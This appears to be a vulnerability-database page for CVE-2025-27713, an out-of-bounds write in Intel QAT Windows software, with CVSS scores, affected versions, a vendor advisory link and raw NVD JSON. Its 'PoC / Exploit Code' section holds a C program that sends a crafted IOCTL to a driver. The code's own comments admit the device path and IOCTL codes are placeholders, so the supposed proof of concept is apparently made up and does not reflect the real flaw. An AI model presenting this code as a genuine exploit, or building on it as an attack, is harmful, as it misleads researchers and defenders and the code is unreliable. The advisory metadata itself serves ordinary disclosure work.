Security Vulnerability Report
CVE-2025-27713 CVSS 7.8 HIGH

CVE-2025-27713

Published: 2025-11-11 17:15:46
Last Modified: 2025-11-26 15:40:37

Description

Out-of-bounds write for some Intel(R) QAT Windows software before version 2.6.0 within Ring 3: User Applications may allow an escalation of privilege. System software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:intel:quickassist_technology:*:*:*:*:*:windows:*:* - VULNERABLE
Intel QAT Windows software < 2.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2025-27713 PoC - Intel QAT Out-of-bounds Write
// This PoC demonstrates the vulnerability in Intel QAT Windows software
// Target: Intel QAT < 2.6.0
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// QAT driver IOCTL codes (placeholder values used by this conceptual PoC)
#define QAT_IOCTL_BASE 0x8000
#define QAT_IOCTL_VULN (QAT_IOCTL_BASE + 0x1)

typedef struct _QAT_BUFFER {
    PVOID Address;
    ULONG Length;
} QAT_BUFFER, *PQAT_BUFFER;

typedef struct _QAT_VULN_INPUT {
    ULONG Size;
    PVOID UserBuffer;
    ULONG OperationType;
} QAT_VULN_INPUT, *PQAT_VULN_INPUT;

int main(void)
{
    HANDLE hDevice;
    QAT_VULN_INPUT input;
    DWORD bytesReturned = 0;
    BOOL result;

    printf("[*] CVE-2025-27713 PoC - Intel QAT Out-of-bounds Write\n");
    printf("[*] Target: Intel QAT Windows software < 2.6.0\n");

    // Open QAT driver handle (device path \\.\QATDriver is a placeholder name)
    hDevice = CreateFileA(
        "\\\\.\\QATDriver",
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open QAT driver\n");
        return 1;
    }
    printf("[+] QAT driver handle obtained\n");

    // Prepare malicious input to trigger out-of-bounds write
    input.Size = 0x1000;
    input.UserBuffer = VirtualAlloc(NULL, 0x2000, MEM_COMMIT, PAGE_READWRITE);
    if (!input.UserBuffer) {
        printf("[-] Failed to allocate memory\n");
        CloseHandle(hDevice);
        return 1;
    }

    // Fill buffer with trigger pattern
    memset(input.UserBuffer, 0x41, 0x1000);
    input.OperationType = 0x1337; // Trigger specific code path

    printf("[*] Sending malicious IOCTL request...\n");

    // Trigger vulnerable code path
    result = DeviceIoControl(
        hDevice,
        QAT_IOCTL_VULN,
        &input,
        sizeof(QAT_VULN_INPUT),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
    if (result) {
        printf("[+] IOCTL request sent - check for privilege escalation\n");
    } else {
        printf("[-] IOCTL request failed\n");
    }

    VirtualFree(input.UserBuffer, 0, MEM_RELEASE);
    CloseHandle(hDevice);
    return 0;
}

// Note: This is a conceptual PoC. Actual exploitation requires:
// 1. Valid authentication as low-privilege user
// 2. Specific knowledge of QAT driver internals
// 3. Precise memory layout manipulation
// 4. High attack complexity (as per CVSS vector)

References

Intel Security Advisory INTEL-SA-01373 (Vendor Advisory): https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01373.html
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-27713",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-11T17:15:45.940",
    "lastModified": "2025-11-26T15:40:36.553",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Out-of-bounds write for some Intel(R) QAT Windows software before version 2.6.0. within Ring 3: User Applications may allow an escalation of privilege. System software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.1,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-787"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:intel:quickassist_technology:*:*:*:*:*:windows:*:*",
                "versionEndExcluding": "2.6.0-0018",
                "matchCriteriaId": "6416303E-851F-4530-875E-D349969919BE"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01373.html",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}